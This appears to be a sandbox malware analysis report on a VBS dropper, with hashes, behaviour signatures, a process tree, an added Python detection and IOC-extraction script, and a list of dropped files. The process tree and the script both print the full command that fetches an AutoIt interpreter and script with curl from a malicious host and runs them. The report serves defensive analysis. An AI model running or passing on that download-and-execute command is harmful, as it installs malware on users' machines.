Analysis

  • max time kernel
    142s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/10/2023, 15:46

General

  • Target
    Report-17.vbs
  • Size
    16KB
  • MD5
    902d4e9234583e12da2d0078d37f5a30
  • SHA1
    7ced5e82455bc1afc788ebf13170f76a219edea2
  • SHA256
    5c084328ab45eb579d31c3157b0f486cbfea6ca0dfd89dda2084ace5745b9549
  • SHA512
    8a0e61e9d3110de4aa10c63b60dd0ace4b3725915c3e20d225986f94c30bd4fe181e94bb21d2771c458b256bdea2028a24f4d6e56c012d46da6032175810c1da
  • SSDEEP
    384:SzE0ig4KR/aQsKsWMnkf+cTPgKekvj27vmJYs:AJHsXkfNEKekvq7eJz

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report-17.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd /d %temp% & curl -o Autoit3.exe http://prestige-castom.com:2351 & curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg & Autoit3.exe ymehvz.au3
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3496
      • C:\Windows\system32\curl.exe
        curl -o Autoit3.exe http://prestige-castom.com:2351
        3⤵
        PID:3808
      • C:\Windows\system32\curl.exe
        curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg
        3⤵
        PID:4352
      • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
        Autoit3.exe ymehvz.au3
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        PID:1568
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
    1⤵
    PID:3680
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k UnistackSvcGroup
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:420
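The process tree above is the whole story of this sample: a VBS run by WScript.exe spawns cmd.exe, which uses the built-in curl.exe to fetch an AutoIt interpreter and a .au3 script into %temp% and then runs the dropped interpreter on the script. The following is an added detection example written for this page, not Triage's own signature logic and not code from the report. It runs rules over constructed Sysmon-style process-creation events that mirror the tree (the PIDs are taken from the report; the parent PID 1000 for the root processes, the pid/ppid/image/cmdline schema, the script-host and downloader lists, and the rule names are all assumptions) and extracts the network and file IOCs from the command lines. The rundll32.exe and svchost.exe entries are separate root-level processes in the report, so they are included as negative cases the rules must not fire on.

```python
"""
Added example (not part of the Triage report): detection logic for the
download-and-execute chain WScript.exe -> cmd.exe -> curl.exe x2 -> dropped
Autoit3.exe, plus IOC extraction from the command lines. Event schema,
LOLBin lists, rule names and the placeholder ppid 1000 are assumptions.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events modelled on the report's process tree (PIDs from the report;
# ppid 1000 is a placeholder for the unknown parent of the root processes).
EVENTS = [
    ProcEvent(3716, 1000, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report-17.vbs"'),
    ProcEvent(3496, 3716, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c cd /d %temp% & curl -o Autoit3.exe '
              r'http://prestige-castom.com:2351 & curl -o ymehvz.au3 '
              r'http://prestige-castom.com:2351/msirzgnzamg & Autoit3.exe ymehvz.au3'),
    ProcEvent(3808, 3496, r"C:\Windows\system32\curl.exe",
              "curl -o Autoit3.exe http://prestige-castom.com:2351"),
    ProcEvent(4352, 3496, r"C:\Windows\system32\curl.exe",
              "curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg"),
    ProcEvent(1568, 3496, r"C:\Users\Admin\AppData\Local\Temp\Autoit3.exe",
              "Autoit3.exe ymehvz.au3"),
    # Root-level system activity from the same report; the rules must not fire on it.
    ProcEvent(3680, 1000, r"C:\Windows\system32\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 '
              r"Microsoft.VCLibs.140.00_8wekyb3d8bbwe"),
    ProcEvent(420, 1000, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k UnistackSvcGroup"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}     # assumption: script hosts
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}  # assumption: LOLBin downloaders
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|Temp)\\", re.I)
URL_RE = re.compile(r"https?://[^\s\"'&]+", re.I)
OUTFILE_RE = re.compile(r"(?:^|\s)-o\s+(\S+)")  # curl's output-file argument


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) findings for the download-and-execute pattern."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings = []
    for e in events:
        name, parent = basename(e.image), by_pid.get(e.ppid)
        # Rule 1: a script host spawning a command shell.
        if name == "cmd.exe" and parent and basename(parent.image) in SCRIPT_HOSTS:
            findings.append(("script_host_spawns_shell", e.pid))
        # Rule 2: a LOLBin downloader writing a URL to a file.
        if name in DOWNLOADERS and URL_RE.search(e.cmdline) and OUTFILE_RE.search(e.cmdline):
            findings.append(("lolbin_download_to_file", e.pid))
        # Rule 3: an image executing from a user-writable directory, with an AutoIt script argument.
        if USER_WRITABLE.search(e.image):
            findings.append(("exe_run_from_user_writable_dir", e.pid))
            if ".au3" in e.cmdline.lower():
                findings.append(("autoit_script_executed", e.pid))
        # Rule 4 (correlation): a parent whose downloader children write a file
        # that another child of the same parent then executes.
        kids = children.get(e.pid, [])
        dropped = {m.group(1).lower() for k in kids if basename(k.image) in DOWNLOADERS
                   for m in OUTFILE_RE.finditer(k.cmdline)}
        executed = {basename(k.image) for k in kids if basename(k.image) not in DOWNLOADERS}
        if dropped & executed:
            findings.append(("download_and_execute_chain", e.pid))
    return findings


def extract_iocs(events):
    """Collect URLs, host:port pairs and curl output filenames from the command lines."""
    urls, hosts, dropped = set(), set(), set()
    for e in events:
        for u in URL_RE.findall(e.cmdline):
            urls.add(u)
            hosts.add(urlparse(u).netloc)
        for m in OUTFILE_RE.finditer(e.cmdline):
            dropped.add(m.group(1))
    return {"urls": sorted(urls), "hosts": sorted(hosts), "dropped": sorted(dropped)}


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:32s} pid={pid}")
    print(extract_iocs(EVENTS))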

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
    • Filesize
      872KB
    • MD5
      c56b5f0201a3b3de53e561fe76912bfd
    • SHA1
      2a4062e10a5de813f5688221dbeb3f3ff33eb417
    • SHA256
      237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
    • SHA512
      195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
  • C:\Users\Admin\AppData\Local\Temp\ymehvz.au3
    • Filesize
      102KB
    • MD5
      151711041ee1619088258f05a5d3bd5b
    • SHA1
      d2047aaf530ce0db076ea7cc7e548fd5a35cee55
    • SHA256
      ead5d943a69f2d8641612415c77ad26daa6d53e1c6ea0270a91d3121eafd943d
    • SHA512
      1085c381dc8f97353bed29e96a10a2e8ba4a6df761c2af56f9cced5cc6b49c80c388e280a2d53b09e20b4e19f1bdcc813d687d52f7f31679f6ee1c84c23037a1
  • C:\temp\gqcsfd
    • Filesize
      388KB
    • MD5
      1ddcfa52d781f75190c18c48e9645b63
    • SHA1
      e2976a957580fde87caa6dd615e01a574292b564
    • SHA256
      1f77719d1f2ffee980d89e74904859e7d098ac1f7d1d09a0e406b1a4a1f8e23c
    • SHA512
      7882772319b3a801b72ebfad7674c35f43261f9f7aa0b163e49da0d898090ca1380db5b209b6263889a1180c68bd75ac6d53fb0fbaeebfca96f167f51a607afb
  • memory/420-27-0x000001E77FA50000-0x000001E77FA60000-memory.dmp
    • Filesize
      64KB
  • memory/420-43-0x000001E77FB50000-0x000001E77FB60000-memory.dmp
    • Filesize
      64KB
  • memory/420-59-0x000001E77FEC0000-0x000001E77FEC1000-memory.dmp
    • Filesize
      4KB
  • memory/420-61-0x000001E77FEF0000-0x000001E77FEF1000-memory.dmp
    • Filesize
      4KB
  • memory/420-63-0x000001E708000000-0x000001E708001000-memory.dmp
    • Filesize
      4KB
  • memory/420-62-0x000001E77FEF0000-0x000001E77FEF1000-memory.dmp
    • Filesize
      4KB
  • memory/1568-18-0x0000000000F30000-0x0000000001330000-memory.dmp
    • Filesize
      4.0MB
  • memory/1568-25-0x0000000005100000-0x00000000052E9000-memory.dmp
    • Filesize
      1.9MB
  • memory/1568-26-0x0000000005100000-0x00000000052E9000-memory.dmp
    • Filesize
      1.9MB